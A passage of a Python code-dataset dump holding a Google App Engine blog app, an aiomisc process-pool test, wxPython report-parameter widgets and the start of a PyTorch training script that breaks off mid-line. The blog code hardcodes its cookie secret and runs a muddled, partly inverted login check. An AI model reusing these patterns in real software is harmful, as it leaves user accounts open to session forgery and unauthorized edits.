    ')\n return render_str(\"comment.html\", login_id=login_id,\n comment=self)\n\n############### NEW COMMENT HANDLER ##############\n\nclass NewComment(BlogHandler):\n def get(self):\n\n if self.read_secure_cookie('usercookie'):\n post_id = self.request.get('post_id')\n self.render(\"newcomment.html\", post_id=post_id)\n else:\n self.redirect('/signup')\n\n def post(self):\n\n auth_error = True\n if self.read_secure_cookie('usercookie'):\n auth_error = False\n else:\n auth_error = True\n username = self.read_secure_cookie('usercookie')\n if not self.user_exists(username):\n auth_error = False\n else:\n auth_error = True\n\n if not auth_error:\n post_id = self.request.get('post_id')\n subject_input = self.request.get('subject')\n content_input = self.request.get('content')\n if self.read_secure_cookie('usercookie'):\n\n user_id = self.read_secure_cookie('usercookie')\n key = db.Key.from_path('User', int(user_id), parent=user_key())\n user = db.get(key)\n\n if subject_input and content_input and user_id:\n comment = Comment(parent=post_key(post_id),\n author_id=user_id,\n author_name=user.username,\n subject=subject_input,\n content=content_input)\n comment.put()\n\n comment_id = str(comment.key().id())\n self.redirect('/comment-%s?post_id=%s' % (comment_id, post_id))\n else:\n input_error = \"Please submit both the title and content.\"\n self.render(\"newcomment.html\", subject=subject_input,\n content=content_input,\n error=input_error,\n post_id=post_id)\n else:\n self.redirect('/signup')\n\n############## COMMENT LINK HANDLER ##############\n\nclass CommentLink(BlogHandler):\n\n def get(self, login_id):\n\n post_id = self.request.get('post_id')\n url_str = self.request.path\n comment_id = url_str.rsplit('comment-', 1)[1]\n comment_key = db.Key.from_path('Comment', int(comment_id),\n parent=post_key(post_id))\n comment = db.get(comment_key)\n\n self.render(\"commentlink.html\", comment=comment)\n\n def post(self, login_id):\n auth_error = True\n if self.read_secure_cookie('usercookie'):\n auth_error = False\n else:\n auth_error = True\n username = self.read_secure_cookie('usercookie')\n if not self.user_exists(username):\n auth_error = False\n else:\n auth_error = True\n\n if not auth_error:\n comment_id = self.request.get('edit_comment_id')\n post_id = self.request.get('post_id')\n comment_key = db.Key.from_path('Comment', int(comment_id),\n parent=post_key(post_id))\n comment= db.get(comment_key)\n\n if self.read_secure_cookie('usercookie'):\n if username == comment.author_id:\n if comment_id and post_id:\n self.redirect('/editcomment?comment_id=%s&post_id=%s' %\n (comment_id, post_id))\n else:\n self.redirect('/signup')\n\n############### EDIT COMMENT HANDLER ################\n\nclass EditComment(BlogHandler):\n\n def get(self):\n\n comment_id = self.request.get('comment_id')\n post_id = self.request.get('post_id')\n key = db.Key.from_path('Comment',\n int(comment_id),\n parent=post_key(post_id))\n\n comment = db.get(key)\n if self.read_secure_cookie('usercookie'):\n user_id = self.read_secure_cookie('usercookie')\n\n if user_id == comment.author_id:\n self.render(\"editcomment.html\",\n subject=comment.subject,\n content=comment.content,\n post_id=post_id,\n comment_id=comment_id)\n else:\n referrer = self.request.headers.get('referer')\n if referrer:\n return self.redirect(referrer)\n return self.redirect_to('/')\n else:\n self.redirect('/signup')\n\n def post(self):\n\n auth_error = True\n if self.read_secure_cookie('usercookie'):\n auth_error = False\n else:\n auth_error = True\n username = self.read_secure_cookie('usercookie')\n if not self.user_exists(username):\n auth_error = False\n else:\n auth_error = True\n\n if not auth_error:\n post_id = self.request.get('post_id')\n comment_id = self.request.get('comment_id')\n subject_input = self.request.get('subject')\n content_input = self.request.get('content')\n comment_key = db.Key.from_path('Comment',\n int(comment_id),\n parent=post_key(post_id))\n\n if subject_input and content_input:\n comment = db.get(comment_key)\n comment.subject = subject_input\n comment.content = content_input\n comment.put()\n\n self.redirect('/comment-%s?post_id=%s' % (comment_id, post_id))\n else:\n input_error = \"Please submit both the title and the content.\"\n self.render(\"editcomment.html\", subject=subject_input,\n content=content_input, error=input_error,\n comment_id=comment_id, post_id=post_id)\n else:\n self.redirect('/signup')\n\n############## DELETE COMMENT ###############\n\nclass DeleteComment(BlogHandler):\n\n def post(self):\n\n auth_error = True\n if self.read_secure_cookie('usercookie'):\n auth_error = False\n else:\n auth_error = True\n username = self.read_secure_cookie('usercookie')\n if not self.user_exists(username):\n auth_error = False\n else:\n auth_error = True\n\n if not auth_error:\n comment_id = self.request.get('comment_id')\n post_id = self.request.get('post_id')\n key = db.Key.from_path('Comment',\n int(comment_id),\n parent=post_key(post_id))\n comment = db.get(key)\n if username == comment.author_id:\n db.delete(key)\n self.render('/commentdeleted.html')\n else:\n self.redirect('/signup')\n\n############### USER DB MODELS #################\n\nclass User(db.Model):\n\n username = db.StringProperty(required=True)\n pass_hash = db.StringProperty(required=True)\n email = db.StringProperty()\n\n############### NEW USER HANDLER SIGN UP ###############\nCOOKIE_SECRET = \"ASLDGKANDFKJAZNHARLFKASDLF\"\n\nEMAIL_RE = re.compile(r\"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\.[a-zA-Z0-9-.]+$)\")\nUSER_RE = re.compile(r\"^[a-zA-Z0-9_-]{3,20}$\")\nPASS_RE = re.compile(r\"^.{3,20}$\")\n\nclass UserSignUp(BlogHandler):\n\n def valid_username(self, username):\n return username and USER_RE.match(username)\n\n def user_exists(self, username):\n\n username_exists = db.GqlQuery(\"SELECT * \"\n \"FROM User \"\n \"WHERE username = :usernm\",\n usernm=username).get()\n return username_exists\n\n def valid_password(self, password):\n return password and PASS_RE.match(password)\n\n def valid_email(self, email):\n return not email or EMAIL_RE.match(email)\n\n def get(self):\n self.render(\"signup.html\")\n\n def post(self):\n\n have_error = False\n username = self.request.get('username')\n password = self.request.get('password')\n verify = self.request.get('verify')\n email = self.request.get('email')\n\n params = dict(username=username, email=email)\n\n if self.user_exists(username):\n params['error_username_exists'] = 'User already Exists'\n have_error = True\n elif not self.valid_username(username):\n params['error_username'] = \"that's not a valid User ID\"\n have_error = True\n\n if not self.valid_password(password):\n params['error_password'] = \"that's not a valid Password\"\n have_error = True\n elif password != verify:\n params['error_verify'] = 'The Passwords do not Match'\n have_error = True\n\n if not self.valid_email(email):\n params['error_email'] = \"That's not a valid Email\"\n have_error = True\n\n if have_error:\n self.render(\"signup.html\", **params)\n else:\n hashed_pass = self.hash_pass(username, password)\n user = User(parent=user_key(),\n username=username,\n pass_hash=hashed_pass,\n email=email)\n user.put()\n user_id = str(user.key().id())\n self.set_secure_cookie('usercookie', user_id, None)\n self.redirect('/welcome')\n\n################ USER LOGIN HANDLER ################\n\nclass UserLogin(BlogHandler):\n\n def get(self):\n self.render(\"login.html\")\n\n def post(self):\n auth_error = True\n username = self.request.get('username')\n password = self.request.get('password')\n\n params = dict(username=username)\n\n if self.user_exists(username):\n auth_error = False\n\n if self.user_auth(username, password):\n auth_error = False\n else:\n auth_error = True\n params['error_password'] = 'Invalid Password'\n else:\n auth_error = True\n params['error_username'] = 'User Does Not Exist'\n\n if auth_error:\n self.render(\"login.html\", **params)\n else:\n user = db.GqlQuery(\"SELECT * \"\n \"FROM User \"\n \"WHERE username = :usernm\",\n usernm=username).get()\n user_id = str(user.key().id())\n self.set_secure_cookie('usercookie', user_id, None)\n self.redirect('/welcome')\n\n################# USERS LOGOUT ######################\n\nclass UserLogout(BlogHandler):\n\n def get(self):\n self.set_secure_cookie('usercookie', '', -1)\n self.redirect('/signup')\n\n################# MAIN PAGE ####################\n\nclass Blog(BlogHandler):\n\n def get(self):\n\n posts = db.GqlQuery(\"SELECT * \"\n \"FROM Post \"\n \"ORDER BY created DESC LIMIT 10\")\n self.render(\"front.html\", posts=posts)\n\n def post(self):\n\n auth_error = True\n if self.read_secure_cookie('usercookie'):\n auth_error = False\n else:\n auth_error = True\n username = self.read_secure_cookie('usercookie')\n if not self.user_exists(username):\n auth_error = False\n else:\n auth_error = True\n\n if not auth_error:\n edit_post_id = self.request.get('edit_post_id')\n comment_post_id = self.request.get('comment_post_id')\n like_post_id = self.request.get('like_post_id')\n if comment_post_id:\n post_id = comment_post_id\n self.redirect('/newcomment?post_id=' + post_id)\n if edit_post_id:\n post_id = edit_post_id\n self.redirect('/editpost?post_id=' + post_id)\n if like_post_id:\n post_id = like_post_id\n user_id = self.read_secure_cookie('usercookie')\n if not like_dup('PostLike', user_id, post_id):\n like = PostLike(like_user_id=user_id,\n parent=post_key(post_id))\n like.put()\n self.redirect('/')\n else:\n self.redirect('/signup')\n\nclass Welcome(BlogHandler):\n def get(self):\n if self.read_secure_cookie('usercookie'):\n user_id = self.read_secure_cookie('usercookie')\n key = db.Key.from_path('User',\n int(user_id),\n parent=user_key())\n\n user = db.get(key)\n\n self.render(\"welcome.html\",\n username=user.username)\n else:\n self.redirect('/signup')\n\napp = webapp2.WSGIApplication([('/?', Blog),\n ('/post-([0-9]+)', PostLink),\n ('/comment-([0-9]+)', CommentLink),\n ('/newpost', NewPost),\n ('/newcomment', NewComment),\n ('/signup', UserSignUp),\n ('/editpost', EditPost),\n ('/editcomment', EditComment),\n ('/login', UserLogin),\n ('/logout', UserLogout),\n ('/deletepost', DeletePost),\n ('/deletecomment', DeleteComment),\n ('/welcome', Welcome)\n ], debug=True)\n","sub_path":"blog.py","file_name":"blog.py","file_ext":"py","file_size_in_byte":27611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"228072609","text":"import asyncio\nimport os\nimport signal\nfrom time import sleep, time\n\nimport pytest\n\nimport aiomisc\nfrom aiomisc.process_pool import ProcessPoolExecutor\n\n\n@pytest.fixture\ndef pool():\n pool = ProcessPoolExecutor(4)\n try:\n yield pool\n finally:\n pool.shutdown(True)\n\n\n@aiomisc.timeout(10)\nasync def test_simple(pool, loop, timer):\n current_time = await loop.run_in_executor(pool, time)\n assert current_time > 0\n\n with timer(1):\n await asyncio.wait_for(\n asyncio.gather(\n *[\n loop.run_in_executor(pool, sleep, 1) for _ in range(4)\n ]\n ), timeout=2,\n )\n\n\n@aiomisc.timeout(10)\nasync def test_exception(pool, loop):\n with pytest.raises(ZeroDivisionError):\n await loop.run_in_executor(pool, divmod, 1, 0)\n\n\ndef suicide():\n os.kill(os.getpid(), signal.SIGINT)\n\n\n@pytest.mark.skip(reason=\"Stuck tests in GH actions\")\n@aiomisc.timeout(10)\nasync def test_exit(pool, loop):\n with pytest.raises(asyncio.TimeoutError):\n await asyncio.wait_for(\n asyncio.gather(\n *[loop.run_in_executor(pool, suicide) for _ in range(4)]\n ), timeout=2,\n )\n","sub_path":"tests/test_process_pool.py","file_name":"test_process_pool.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"220488840","text":"# -*- coding: utf8 -*-\n\n\"\"\"Quickreport\n\nI widget che corrispondono ai vari tipi di parametri possibili. \nQuando in .params.py si specifica un tipo per un parametro, cio' che \nviene visualizzato nella gui e' il widget corrispondente qui definito.\n\n==========================================\n:version: vedi quickreport.__version.py__\n:copyright: Riccardo Polignieri 2012\n:license: ISC\n\"\"\"\n\nimport wx\nimport wx.lib.masked as masked\nimport datetime\n\nfrom gui_utils import post_evt_param_changed, EVT_PARAM_CHANGED\n\n__all__ = ['text', 'integer', 'boolean', \n 'symple_list', 'droplist', \n 'currency',\n 'date', 'period', \n 'month', 'bimester', 'trimester', 'quadrimester', 'semester']\n\n\n# 'text' type input parameter =================================================\nclass TextWidget(wx.TextCtrl):\n def __init__(self, *a, **k):\n use_evt_char = k.pop('track_changes', False)\n wx.TextCtrl.__init__(self, *a, **k)\n self._val = ''\n evt = wx.EVT_CHAR if use_evt_char else wx.EVT_KILL_FOCUS\n self.Bind(evt, self.on_change)\n \n def on_change(self, evt):\n evt.Skip()\n val = self.GetValue() \n if val != self._val:\n self._val = val\n post_evt_param_changed(evt)\n \n def SetValue (self, val):\n self._val = val\n wx.TextCtrl.SetValue(self, val)\n \n def SetBounds(self, val): pass\n \ndef text(parent, track_changes=False): \n return TextWidget(parent, track_changes=track_changes)\n \n \n# 'integer' type input parameter ===============================================\nclass IntegerWidget(wx.SpinCtrl):\n def __init__(self, *a, **k):\n wx.SpinCtrl.__init__(self, *a, **k)\n self.Bind(wx.EVT_SPIN, post_evt_param_changed)\n \n def SetBounds(self, bounds): return wx.SpinCtrl.SetRange(self, *bounds)\n\ndef integer(parent): return IntegerWidget(parent)\n\n\n# 'boolean' type input parameter ===============================================\nclass BooleanWidget(wx.CheckBox):\n def __init__(self, *a, **k):\n wx.CheckBox.__init__(self, *a, **k)\n self.Bind(wx.EVT_CHECKBOX, post_evt_param_changed)\n \n def SetBounds(self, val): pass\n \ndef boolean(parent): return BooleanWidget(parent)\n\n\n# 'symple_list' type input parameter ===========================================\nclass SimpleListWidget(wx.ListBox):\n def __init__(self, *a, **k):\n self.multichoice = k.pop('multichoice')\n self.select_all = k.pop('select_all', '')\n if self.multichoice:\n k['style'] = wx.LB_EXTENDED\n else:\n self.select_all = '' # just in case of user's mistake\n wx.ListBox.__init__(self, *a, **k)\n funct = self.on_select if self.select_all else post_evt_param_changed\n self.Bind(wx.EVT_LISTBOX, funct)\n self._all_selected = False\n \n def on_select(self, evt): # used only in case of self.select_all\n if evt.GetSelection() == 0:\n for i in self.GetItems():\n self.SetStringSelection(i, (not self._all_selected))\n self._all_selected = not self._all_selected\n post_evt_param_changed(evt)\n \n def SetBounds(self, bounds):\n if self.select_all: \n bounds = [self.select_all] + list(bounds)\n self.SetItems(bounds)\n \n def SetValue(self, val):\n if val is None: \n self.SetSelection(-1)\n return\n if self.multichoice:\n strings = self.GetStrings()\n if val == 'all':\n val = strings\n elif val == 'none':\n val = []\n for v in strings:\n self.SetStringSelection(v, (v in val))\n else:\n self.SetStringSelection(val)\n \n def GetValue(self):\n if self.multichoice:\n if self.select_all: self.SetSelection(0, False)\n return [self.GetString(i) for i in self.GetSelections()]\n else:\n return self.GetStringSelection()\n\nclass TwoFieldsListWidget(wx.ListBox):\n def __init__(self, *a, **k):\n self.multichoice = k.pop('multichoice')\n self.select_all = k.pop('select_all', '')\n if self.multichoice:\n k['style'] = wx.LB_EXTENDED\n else:\n self.select_all = '' # just in case of user's mistake\n wx.ListBox.__init__(self, *a, **k)\n self.ids = []\n self._all_selected = False\n funct = self.on_select if self.select_all else post_evt_param_changed\n self.Bind(wx.EVT_LISTBOX, funct)\n \n def on_select(self, evt): # used only in case of self.select_all\n if evt.GetSelection() == 0:\n for i in self.GetItems():\n self.SetStringSelection(i, (not self._all_selected))\n self._all_selected = not self._all_selected\n post_evt_param_changed(evt)\n \n def SetBounds(self, bounds):\n if self.select_all: \n bounds = [[None, self.select_all]] + list(bounds)\n self.ids, items = zip(*bounds)\n self.SetItems(items)\n \n def SetValue(self, val):\n if not val: \n self.SetSelection(-1)\n return\n if self.multichoice:\n if val == 'all':\n val = self.ids\n elif val == 'none':\n val = []\n for n, v in enumerate(self.ids):\n self.SetSelection(n, (v in val))\n else:\n self.SetSelection(self.ids.index(val))\n \n def GetValue(self):\n if self.multichoice:\n if self.select_all: self.SetSelection(0, False)\n return [self.ids[i] for i in self.GetSelections()]\n else:\n return self.ids[self.GetSelection()]\n\nclass MultiChoiceListWidget(wx.CheckListBox):\n def __init__(self, *a, **k):\n self.use_id = k.pop('use_id')\n self.select_all = k.pop('select_all', '')\n wx.CheckListBox.__init__(self, *a, **k)\n if self.use_id:\n self.ids = []\n self.Bind(wx.EVT_CHECKLISTBOX, self._on_check)\n\n def _on_check(self, evt):\n item = evt.GetSelection()\n if self.select_all and (item == 0):\n check = self.IsChecked(0)\n for n, i in enumerate(self.GetItems()[1:]):\n self.Check(n+1, check)\n self.SetSelection(item)\n post_evt_param_changed(evt)\n \n def SetBounds(self, bounds):\n if self.use_id:\n if self.select_all:\n bounds = [[None, self.select_all]] + list(bounds)\n self.ids, items = zip(*bounds)\n self.SetItems(items)\n else:\n if self.select_all: \n bounds = [self.select_all] + list(bounds)\n self.SetItems(bounds)\n \n def SetValue(self, val):\n if not val: \n self.SetSelection(-1)\n return\n elif val == 'none':\n val = []\n if self.use_id:\n if val == 'all':\n val = self.ids\n for n, v in enumerate(self.ids):\n self.Check(n, (v in val))\n else:\n strings = self.GetStrings()\n if val == 'all':\n val = strings\n for n, v in enumerate(strings):\n self.Check(n, (v in val))\n \n def GetValue(self):\n if self.use_id:\n return [n+1 for n, i in enumerate(self.ids[1:]) if self.IsChecked(i)]\n else:\n res = list(self.GetCheckedStrings())\n try: res.remove(self.select_all)\n except ValueError: pass\n return res\n \ndef symple_list(parent, use_id=False, multichoice=False, select_all=False): \n if multichoice and wx.PlatformInfo[1] in ('wxMSW', 'wxGTK'):\n return MultiChoiceListWidget(parent, use_id=use_id, select_all=select_all)\n if use_id:\n return TwoFieldsListWidget(parent, multichoice=multichoice, select_all=select_all)\n else:\n return SimpleListWidget(parent, multichoice=multichoice, select_all=select_all)\n \n\n# 'droplist' type input parameter ==============================================\nclass DropDownListWidget(wx.ComboBox):\n def __init__(self, *a, **k):\n k['style'] = wx.CB_DROPDOWN|wx.CB_READONLY\n wx.ComboBox.__init__(self, *a, **k)\n self.Bind(wx.EVT_COMBOBOX, post_evt_param_changed)\n \n SetBounds = wx.ComboBox.SetItems\n \nclass TwoFieldsDropDownWidget(wx.ComboBox):\n def __init__(self, *a, **k):\n k['style'] = wx.CB_DROPDOWN|wx.CB_READONLY\n wx.ComboBox.__init__(self, *a, **k)\n self.ids = []\n self.Bind(wx.EVT_COMBOBOX, post_evt_param_changed)\n \n def SetBounds(self, bounds):\n self.ids = []\n self.Clear()\n for i in bounds:\n self.ids.append(i[0])\n self.Append(i[1])\n \n def SetValue(self, val):\n if val is None: \n wx.ComboBox.SetSelection(self, -1)\n return\n wx.ComboBox.SetSelection(self, self.ids.index(val))\n \n def GetValue(self):\n return self.ids[self.GetSelection()]\n\ndef droplist(parent, use_id=False): \n if use_id: return TwoFieldsDropDownWidget(parent)\n else: return DropDownListWidget(parent)\n\n\n# 'currency' type input parameter ==============================================\nEURO_CONVENTIONS = { # note: actually, conventions for euro adopted in _Italy_!\n 'mon_decimal_point': ',', 'int_frac_digits': 2, 'p_sep_by_space': 1, \n 'frac_digits': 2, 'thousands_sep': '.', 'n_sign_posn': 3, 'decimal_point': ',', \n 'int_curr_symbol': 'EUR', 'n_cs_precedes': 1, 'p_sign_posn': 3, \n 'mon_thousands_sep': '.', 'negative_sign': '-', 'currency_symbol': '\\x80', \n 'n_sep_by_space': 1, 'mon_grouping': [3, 0], 'p_cs_precedes': 1, \n 'positive_sign': '', 'grouping': [3, 0]}\nDOLLAR_CONVENTIONS = { # conventions for usd adopted in USA\n 'mon_decimal_point': '.', 'int_frac_digits': 2, 'p_sep_by_space': 0, \n 'frac_digits': 2, 'thousands_sep': ',', 'n_sign_posn': 0, 'decimal_point': '.', \n 'int_curr_symbol': 'USD', 'n_cs_precedes': 1, 'p_sign_posn': 3, \n 'mon_thousands_sep': ',', 'negative_sign': '-', 'currency_symbol': '$', \n 'n_sep_by_space': 0, 'mon_grouping': [3, 0], 'p_cs_precedes': 1, \n 'positive_sign': '', 'grouping': [3, 0]}\nPOUND_CONVENTIONS = { # conventions for pounds adopted in GB\n 'mon_decimal_point': '.', 'int_frac_digits': 2, 'p_sep_by_space': 0, \n 'frac_digits': 2, 'thousands_sep': ',', 'n_sign_posn': 3, 'decimal_point': '.', \n 'int_curr_symbol': 'GBP', 'n_cs_precedes': 1, 'p_sign_posn': 3, \n 'mon_thousands_sep': ',', 'negative_sign': '-', 'currency_symbol': '\\xa3', \n 'n_sep_by_space': 0, 'mon_grouping': [3, 0], 'p_cs_precedes': 1, \n 'positive_sign': '', 'grouping': [3, 0]}\n\nclass CurrencyWidget(wx.Panel):\n def __init__(self, *a, **k):\n use_decimal = k.pop('use_decimal')\n conv = k.pop('conventions')\n if conv == 'euro' : conv = EURO_CONVENTIONS\n elif conv == 'dollar': conv = DOLLAR_CONVENTIONS\n elif conv == 'pound' : conv = POUND_CONVENTIONS\n wx.Panel.__init__(self, *a, **k)\n \n self.currency = masked.NumCtrl(self, limited=True,\n fractionWidth = (conv['frac_digits'] if use_decimal else 0),\n groupDigits = (conv['mon_grouping'][0]>0),\n groupChar = conv['thousands_sep'],\n decimalChar = conv['decimal_point'],\n useParensForNegatives = (conv['n_sign_posn']==0))\n self.currency.Bind(masked.EVT_NUM, post_evt_param_changed)\n \n s = wx.BoxSizer()\n s.Add(wx.StaticText(self, -1, conv['currency_symbol']), 0, \n wx.ALIGN_CENTER_VERTICAL, 0)\n s.Add(self.currency, 1, wx.EXPAND|wx.ALL, 5)\n self.SetSizer(s)\n \n def SetBounds(self, bounds):\n # TODO disconnect event \n self.currency.SetMin(bound[0])\n self.currency.SetMax(bounds[1])\n \n def SetValue(self, val):\n # TODO disconnect event\n self.currency.SetValue(val)\n \n def GetValue(self): \n return self.currency.GetValue()\n \ndef currency(parent, conventions='euro', use_decimal=True):\n return CurrencyWidget(parent, conventions=conventions, use_decimal=use_decimal)\n\n\n# 'date' type input parameter ==================================================\nclass DateWidget(wx.DatePickerCtrl):\n def __init__(self, *a, **k):\n wx.DatePickerCtrl.__init__(self, *a, **k)\n self._min = None\n self._max = None\n self.Bind(wx.EVT_DATE_CHANGED, self.on_changed)\n\n def on_changed(self, evt):\n if (self._min is not None) and (self.GetValue() < self._min): \n self.SetValue(self._min)\n elif (self._max is not None) and (self.GetValue() > self._max): \n self.SetValue(self._max)\n# post_evt_param_changed(evt)\n \n def SetBounds(self, bounds):\n if bounds is None: return \n self._min, self._max = bounds\n self.on_changed(None)\n \n def GetValue(self):\n y, m, d = map(int, \n wx.DatePickerCtrl.GetValue(self).FormatISODate().split('-'))\n return datetime.date(y, m, d)\n \n def SetValue(self, v):\n tt = v.timetuple()\n dmy = (tt[2], tt[1]-1, tt[0])\n wx.DatePickerCtrl.SetValue(self, wx.DateTimeFromDMY(*dmy))\n \ndef date(parent): return DateWidget(parent, style=wx.DP_DROPDOWN|wx.DP_SHOWCENTURY)\n\n\n# 'period' type input parameter ================================================\nclass PeriodWidget(wx.Panel):\n def __init__(self, *a, **k):\n wx.Panel.__init__(self, *a, **k)\n self.period_from = DateWidget(self, style=wx.DP_DROPDOWN|wx.DP_SHOWCENTURY)\n self.period_to = DateWidget(self, style=wx.DP_DROPDOWN|wx.DP_SHOWCENTURY)\n s = wx.FlexGridSizer(2, 2, 5, 5)\n s.AddGrowableCol(1)\n s.Add(wx.StaticText(self, -1, 'from'), 0, wx.ALIGN_CENTER_VERTICAL)\n s.Add(self.period_from, 1, wx.EXPAND|wx.ALL, 5)\n s.Add(wx.StaticText(self, -1, 'to'), 0, wx.ALIGN_CENTER_VERTICAL)\n s.Add(self.period_to, 1, wx.EXPAND|wx.ALL, 5)\n self.Bind(EVT_PARAM_CHANGED, self.on_date_changed)\n self.SetSizer(s)\n \n def on_date_changed(self, evt): \n if evt: evt.Skip()\n from_, to = self.GetValue()\n if from_ > to:\n self.SetValue((to, to))\n \n def SetBounds(self, bounds):\n if bounds is None: return\n self.period_from.SetBounds(bounds)\n self.period_to.SetBounds(bounds)\n \n def SetValue(self, val):\n self.period_from.SetValue(val[0])\n self.period_to.SetValue(val[1])\n\n def GetValue(self):\n return self.period_from.GetValue(), self.period_to.GetValue()\n \ndef period(parent): return PeriodWidget(parent)\n\n\n# 'fixed period family' type input parameters ==================================\nfrom math import ceil\nclass FixedPeriodWidget(wx.Panel):\n months = 'January February March April May June July August September October November December'.split()\n spans = ',, bimester, trimester, quadrimester,, semester'.split(',')\n def __init__(self, *a, **k):\n self.period = k.pop('period')\n wx.Panel.__init__(self, *a, **k)\n if self.period == 1:\n ch = self.months\n else:\n ch = [str(i)+self.spans[self.period] for i in range(1, (12/self.period)+1)]\n self.division = wx.ComboBox(self, -1, choices=ch, \n style=wx.CB_DROPDOWN|wx.CB_READONLY)\n self.year = wx.SpinCtrl(self, min=1800, max=2200, size=((80, -1)))\n s = wx.BoxSizer()\n s.Add(self.division, 1, wx.EXPAND|wx.RIGHT, 5)\n s.Add(self.year, 0, wx.FIXED_MINSIZE|wx.LEFT, 5)\n self.SetSizer(s)\n self.Bind(wx.EVT_COMBOBOX, self.on_changed, self.division)\n self.Bind(wx.EVT_SPINCTRL, self.on_changed, self.year)\n \n def on_changed(self, evt):\n evt.SetEventObject(self)\n post_evt_param_changed(evt)\n \n def GetValue(self):\n start = datetime.date(\n self.year.GetValue(), \n ((self.period * self.division.GetSelection()) + 1),\n 1)\n end = ((start + \n datetime.timedelta(days=(30*self.period)+15)).replace(day=1) - \n datetime.timedelta(days=1))\n return start, end\n \n def SetValue(self, val):\n self.year.SetValue(val.year)\n self.division.SetSelection(int(ceil(float(val.month)/self.period))-1)\n \n def SetBounds(self, bounds): \n if bounds is None: return\n try: min = bounds[0].year\n except AttributeError: min=None\n try: max = bounds[1].year\n except AttributeError: max=None\n self.year.SetRange(min, max)\n\n\ndef _fixed_period(period, parent): return FixedPeriodWidget(parent, period=period)\n\ndef month(parent): return _fixed_period(1, parent)\ndef bimester(parent): return _fixed_period(2, parent)\ndef trimester(parent): return _fixed_period(3, parent)\ndef quadrimester(parent): return _fixed_period(4, parent)\ndef semester(parent): return _fixed_period(6, parent)\n\n\n","sub_path":"quickreport/param_types.py","file_name":"param_types.py","file_ext":"py","file_size_in_byte":17240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"249356939","text":"import os\nimport time\nimport math\nimport logging\nimport datetime\nimport numpy as np\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.autograd import Variable\n\nfrom src import dataset, models, utils\n\n\nlogger = logging.getLogger('main')\n\n\nargs = {\n 'exp_id': 'p1_baseline',\n 'model': 'baseline',\n\n 'test': False,\n 'resume': None,\n\n 'out_path': 'results',\n\n 'trainset': './canvas/social-checkin-prediction/train.csv',\n 'valset': './canvas/social-checkin-prediction/validation.csv',\n 'testset': './canvas/social-checkin-prediction/test.csv',\n 'data_workers': 1, \n 'map_size': (2915, 1982),\n \n 'epochs': 40,\n 'batch_size': 64,\n\n 'lr':0.01,\n 'lr_decay': 0.1,\n 'lr_steps': 0.25,\n\n 'loc_scale': 10,\n 'time_scale': 1, \n\n 'val_freq': 1, \n 'log_freq': 100,\n 'checkpoint_freq': 10,\n}\n\n\ndef main():\n logger.info('--- experiment: {0} ---\\n'.format(args['exp_id']))\n\n # prepare path\n args['out_path'] = \"{root}/{exp_id}/{date:%Y-%m-%d_%H:%M:%S}/\".format(\n root=args['out_path'], exp_id=args['exp_id'], date=datetime.datetime.now())\n logger.info('experiment folder: \\n {0} \\n'.format(args['out_path']))\n\n checkpoint_path = os.path.join(args['out_path'], 'ckpt')\n if not os.path.exists(checkpoint_path):\n os.makedirs(checkpoint_path)\n\n # handle multiply GPUs\n gpu_num = torch.cuda.device_count()\n logger.info('GPU: \\n total GPU(s): {0}'.format(gpu_num))\n if gpu_num < 1:\n logger.error(' no GPU be detected')\n\n args['lr'] *= gpu_num\n args['batch_size'] *= gpu_num\n args['data_workers'] *= gpu_num\n logger.info(' total learn rate: {0}\\n'\n ' total batch size: {1}\\n'\n ' total data workers: {2}\\n'\n .format(args['lr'], args['batch_size'], args['data_workers']))\n\n # create dataloader\n trainset = dataset.CheckInDataset(args['trainset'], map_size=args['map_size'])\n valset = dataset.CheckInDataset(args['valset'], map_size=args['map_size'])\n testset = dataset.CheckInDataset(args['testset'], map_size=args['map_size'])\n\n train_loader = torch.utils.data.DataLoader(trainset, batch_size=args['batch_size'], shuffle=True,\n num_workers=args['data_workers'], pin_memory=True, drop_last=True)\n val_loader = torch.utils.data.DataLoader(valset, batch_size=args['batch_size'], shuffle=False,\n num_workers=args['data_workers'], pin_memory=True)\n test_loader = torch.utils.data.DataLoader(testset, batch_size=args['batch_size'], shuffle=False,\n num_workers=args['data_workers'], pin_memory=True)\n\n # create network\n model = models.__dict__[args['model']]()\n model = nn.DataParallel(model)\n model = model.cuda()\n logger.info('model: \\n {0}\\n'.format(args['model']))\n logger.info(models.model_str(model))\n\n # create optimizer\n optimizer = optim.Adam(model.parameters(), lr=args['lr'])\n lr_scheduler = optim.lr_scheduler.StepLR(\n optimizer, step_size=int(args['lr_steps'] * args['epochs']), gamma=args['lr_decay'])\n\n # load state from checkpoint\n start_epoch = 0\n if args['resume'] is not None: \n logger.info('load checkpoint: ' + args['resume'])\n checkpoint = torch.load(args['resume'])\n start_epoch = checkpoint['epoch']\n model.load_state_dict(checkpoint['model'])\n optimizer.load_state_dict(checkpoint['optimizer'])\n lr_scheduler.load_state_dict(checkpoint['lr_scheduler'])\n\n if args['test']:\n logger.info('--- start to test model ---')\n test(model, test_loader, 0)\n return\n\n # main training loop\n for epoch in range(start_epoch, args['epochs']):\n logger.info('--- start to train epoch: {0} ---'.format(epoch))\n timer = time.time()\n\n train(model, train_loader, optimizer, epoch)\n\n if epoch % args['val_freq'] == 0:\n logger.info('--- start to test epoch: {0} ---'.format(epoch))\n test(model, test_loader, epoch)\n\n if epoch % args['checkpoint_freq'] == 0:\n state = {\n 'epoch': epoch + 1,\n 'model': model.state_dict(),\n 'optimizer': optimizer.state_dict(),\n 'lr_scheduler': lr_scheduler.state_dict()\n }\n\n state_file = os.path.join(checkpoint_path, 'checkpoint.{0}.ckpt'.format(epoch))\n logger.info(\"--- checkpoint saved to %s ---\" % state_file)\n torch.save(state, state_file)\n\n lr_scheduler.step()\n logger.info('--- epoch in {} seconds ---\\n'.format(time.time() - timer))\n\n\ndef train(model, train_loader, optimizer, epoch):\n meters = utils.AverageMeterSet()\n\n mse_loss = nn.MSELoss()\n\n model.train()\n for idx, (user_id, in_data, gt_data) in enumerate(train_loader):\n timer = time.time()\n optimizer.zero_grad()\n \n user_id = Variable(user_id).cuda()\n in_data = Variable(in_data).cuda()\n gt_data = Variable(gt_data).cuda()\n \n pred_loc, pred_time = model.forward(in_data)\n\n gt_loc = 